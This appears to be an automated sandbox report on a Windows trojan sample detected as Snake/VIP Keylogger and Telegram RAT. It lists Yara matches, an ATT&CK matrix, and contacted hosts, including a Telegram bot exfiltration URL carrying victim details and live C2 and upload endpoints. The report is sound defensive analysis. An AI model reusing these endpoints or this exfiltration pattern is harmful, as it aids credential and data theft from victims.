Source: lsc5QN46NH.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00676283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00676283
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00676747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00676747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	2 Valid Accounts	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lsc5QN46NH.exe	31%	Virustotal		Browse
lsc5QN46NH.exe	21%	ReversingLabs	Win32.Trojan.AutoitInject
lsc5QN46NH.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enH	svchost.exe, 00000002.00000002.3934335927.00000000054AC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	svchost.exe, 00000002.00000002.3934335927.00000000054E7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/H	svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	svchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a	svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enl	svchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/l	svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	svchost.exe, 00000002.00000002.3934335927.00000000054B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	svchost.exe, 00000002.00000002.3934335927.00000000053B8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588171
Start date and time:	2025-01-10 22:12:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lsc5QN46NH.exe renamed because original name is a hash value
Original Sample Name:	6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 53 Number of non-executed functions: 273
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:13:36	API Interceptor	10185674x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse
193.122.130.0	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
reallyfreegeoip.org	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
api.telegram.org	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F8940